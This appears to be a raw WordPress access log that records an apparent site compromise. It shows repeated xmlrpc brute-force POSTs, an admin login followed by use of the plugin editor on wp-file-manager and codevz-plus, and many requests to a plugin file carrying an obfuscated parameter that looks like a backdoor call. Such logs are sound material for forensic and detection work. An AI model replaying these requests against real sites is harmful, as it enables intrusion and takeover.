138.201.22.4 - - [21/Apr/2026:20:47:25 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383034352p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343434352q6162353234643336613366303138333939346266303634656163653034656635222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
23.137.105.214 - - [21/Apr/2026:20:49:21 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:49:31 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:49:36 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:49:48 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
66.249.73.97 - - [21/Apr/2026:20:49:53 +0000] "GET /content.php?e=3647194770772 HTTP/1.1" 404 22845 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.137.105.214 - - [21/Apr/2026:20:49:53 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:50:02 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:08 +0000] "HEAD / HTTP/1.1" 200 0 "https://www.smilepack.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:14 +0000] "POST /wp-login.php HTTP/1.1" 200 3145 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://www.smilepack.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:50:07 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:18 +0000] "GET /wp-admin/ HTTP/1.1" 200 78157 "https://www.smilepack.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:50:18 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:22 +0000] "GET /wp-admin/ HTTP/1.1" 200 66541 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:25 +0000] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 403 1242 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:25 +0000] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 403 1242 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:24 +0000] "GET /wp-admin/ HTTP/1.1" 200 66573 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:25 +0000] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 403 1242 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:25 +0000] "GET /wp-admin/ HTTP/1.1" 200 66688 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:26 +0000] "GET /wp-admin/ HTTP/1.1" 200 66573 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:26 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:27 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 103 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 103 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:33 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 200 90796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:33 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 200 90658 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:35 +0000] "GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1" 403 1040 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:35 +0000] "GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1" 403 1040 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:36 +0000] "GET /wp-admin/theme-install.php?tab=upload HTTP/1.1" 403 1242 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:37 +0000] "GET /wp-admin/theme-install.php?tab=upload HTTP/1.1" 403 1242 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:37 +0000] "GET /wp-admin/ HTTP/1.1" 200 66687 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:38 +0000] "GET /wp-admin/plugin-editor.php?plugin=wp-file-manager%2Ffile_folder_manager.php&Submit=Select HTTP/1.1" 500 1071 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:25 +0000] "GET /wp-admin/ HTTP/1.1" 200 66638 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:27 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:50:24 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:33 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 103 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:35 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 200 90795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:36 +0000] "GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1" 403 1040 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:37 +0000] "GET /wp-admin/theme-install.php?tab=upload HTTP/1.1" 403 1242 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:37 +0000] "GET /wp-admin/ HTTP/1.1" 200 66639 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:50:34 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:39 +0000] "GET /wp-admin/plugin-editor.php?plugin=wp-file-manager%2Ffile_folder_manager.php&Submit=Select HTTP/1.1" 500 1071 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:41 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:50:39 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:42 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:47 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:48 +0000] "GET /wp-admin/plugin-editor.php?plugin=wp-file-manager%2Ffile_folder_manager.php&Submit=Select HTTP/1.1" 200 81130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:48:49 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383132392p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343532392q3933633462666362383631313863626161323730653861666239303132613730222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
70.35.205.237 - - [21/Apr/2026:20:50:38 +0000] "GET /wp-admin/ HTTP/1.1" 200 66572 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:39 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:40 +0000] "GET /wp-admin/plugin-editor.php?plugin=wp-file-manager%2Ffile_folder_manager.php&Submit=Select HTTP/1.1" 500 1071 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:41 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:40 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 220 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:45 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:42 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 191 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:47 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 203 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:47 +0000] "GET /wp-admin/plugin-editor.php?plugin=wp-file-manager%2Ffile_folder_manager.php&Submit=Select HTTP/1.1" 200 81042 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:48 +0000] "GET /wp-admin/plugin-editor.php?plugin=wp-file-manager%2Ffile_folder_manager.php&Submit=Select HTTP/1.1" 200 81172 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:49 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:51 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:52 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:53 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:53 +0000] "GET /wp-admin/plugin-editor.php HTTP/1.1" 200 122443 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:54 +0000] "GET /wp-admin/plugin-editor.php HTTP/1.1" 200 122384 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:50:46 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:49 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 93 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:52 +0000] "GET /wp-content/plugins/wp-file-manager/file_folder_manager.php HTTP/1.1" 403 1242 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:53 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:54 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:55 +0000] "GET /wp-admin/plugin-editor.php HTTP/1.1" 200 122411 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:56 +0000] "GET /wp-admin/plugin-editor.php?plugin=codevz-plus%2Fcodevz-plus.php&Submit=Select HTTP/1.1" 200 122504 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:58 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 6075 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:50:52 +0000] "POST //xmlrpc.php HTTP/1.1" 200 54790 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:51:01 +0000] "POST //xmlrpc.php HTTP/1.1" 200 54790 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:49:10 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383135302p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343535302q3832656336633434643632636666353463633163316262663166393133373462222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:49:31 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383137312p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343537312q3064353733613266376365363839633433633563613536623235633534656233222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:45:59 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830373935392p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343335392q3762633931636464666362653366393262366132643634366137393933613938222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
70.35.205.237 - - [21/Apr/2026:20:50:12 +0000] "HEAD / HTTP/1.1" 200 0 "https://www.smilepack.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:48:28 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383130382p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343530382q6566363562653937393130333030383330373265623165376139333434333564222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:50:58 +0000] "GET /?wp_scrape_key=27c1d6d9637f92856f335d8c288613bf&wp_scrape_nonce=243599858 HTTP/1.1" 200 4686 "-" "WordPress/6.9.4; https://www.smilepack.net"
70.35.205.237 - - [21/Apr/2026:20:50:59 +0000] "GET /wp-content/plugins/codevz-plus/codevz-plus.php HTTP/1.1" 403 1242 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:50:13 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383231332p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343631332q6134383130346162383463386639643433373462396463306432393331636262222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:50:34 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383233342p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343633342q3137643562616664616135376439633732366236303733346132613032303831222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:49:52 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383139322p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343539322q3637306632353034653835643862306236623537356237386536663961393631222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:50:55 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383235352p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343635352q6133366535613263366462653839323330356637393664343039323462643766222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:51:58 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383331382p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343731382q6534376639393064383537636238633332663464313535653536323430366162222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
